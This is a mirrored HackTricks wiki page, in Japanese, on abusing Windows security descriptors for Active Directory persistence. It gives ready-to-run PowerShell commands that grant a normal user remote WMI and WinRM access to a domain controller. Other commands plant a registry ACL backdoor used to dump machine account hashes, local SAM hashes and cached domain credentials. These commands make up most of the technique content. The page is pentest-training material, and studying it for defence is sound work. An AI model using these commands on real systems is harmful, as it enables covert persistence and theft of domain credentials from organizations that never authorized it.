mirror of
https://github.com/carlospolop/hacktricks
synced 2025-02-16 22:18:27 +00:00
6.1 KiB
6.1 KiB
セキュリティ記述子
AWSハッキングをゼロからヒーローまで学ぶには、 htARTE (HackTricks AWS Red Team Expert)をご覧ください!
HackTricksをサポートする他の方法:
- HackTricksにあなたの会社を広告したい、またはHackTricksをPDFでダウンロードしたい場合は、サブスクリプションプランをチェックしてください!
- 公式PEASS & HackTricksグッズを入手する
- The PEASS Familyを発見し、独占的なNFTsのコレクションをチェックする
- 💬 Discordグループに参加するか、テレグラムグループに参加するか、Twitter 🐦 @carlospolopmをフォローする。
- HackTricksとHackTricks CloudのgithubリポジトリにPRを提出して、あなたのハッキングテクニックを共有する。
セキュリティ記述子
セキュリティ記述子定義言語(SDDL)は、セキュリティ記述子を記述するために使用される形式を定義します。SDDLは、DACLとSACLのためにACE文字列を使用します: ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid;
セキュリティ記述子は、オブジェクトが他のオブジェクトに対して持つ権限を保存するために使用されます。オブジェクトのセキュリティ記述子にわずかな変更を加えることができれば、特権グループのメンバーでなくても、そのオブジェクトに対して非常に興味深い権限を得ることができます。
したがって、この永続化テクニックは、特定のオブジェクトに対して必要なすべての権限を獲得する能力に基づいており、通常は管理者権限が必要なタスクを、管理者でなくても実行できるようにするものです。
WMIへのアクセス
ユーザーにリモートでWMIを実行するアクセスを与えるには、これを使用します:
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc –namespace 'root\cimv2' -Verbose
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc–namespace 'root\cimv2' -Remove -Verbose #Remove
WinRMへのアクセス
winrm PSコンソールへのユーザーアクセスを許可する方法はこちら:
Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Verbose
Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Remove #Remove
ハッシュへのリモートアクセス
レジストリにアクセスし、DAMPを使用してレジ回路バックドアを作成し、ハッシュをダンプします。これにより、いつでもコンピュータのハッシュ、SAM、およびコンピュータにキャッシュされたADの資格情報を取得できます。したがって、この権限をドメインコントローラコンピュータに対する通常のユーザーに与えることは非常に有用です:
# allows for the remote retrieval of a system's machine and local account hashes, as well as its domain cached credentials.
Add-RemoteRegBackdoor -ComputerName <remotehost> -Trustee student1 -Verbose
# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local machine account hash for the specified machine.
Get-RemoteMachineAccountHash -ComputerName <remotehost> -Verbose
# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local SAM account hashes for the specified machine.
Get-RemoteLocalAccountHash -ComputerName <remotehost> -Verbose
# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the domain cached credentials for the specified machine.
Get-RemoteCachedCredential -ComputerName <remotehost> -Verbose
ドメインコントローラーのコンピューターアカウントのハッシュを使用する方法については、Silver Ticketsを確認してください。
AWSハッキングをゼロからヒーローまで学ぶには htARTE (HackTricks AWS Red Team Expert)をチェックしてください!
HackTricksをサポートする他の方法:
- HackTricksにあなたの会社を広告したい、またはHackTricksをPDFでダウンロードしたい場合は、SUBSCRIPTION PLANSをチェックしてください!
- 公式のPEASS & HackTricksグッズを入手してください。
- The PEASS Familyを発見し、独占的なNFTsのコレクションをチェックしてください。
- 💬 Discordグループに参加するか、telegramグループに参加するか、Twitter 🐦 @carlospolopmをフォローしてください。
- HackTricksとHackTricks CloudのgithubリポジトリにPRを提出して、あなたのハッキングのコツを共有してください。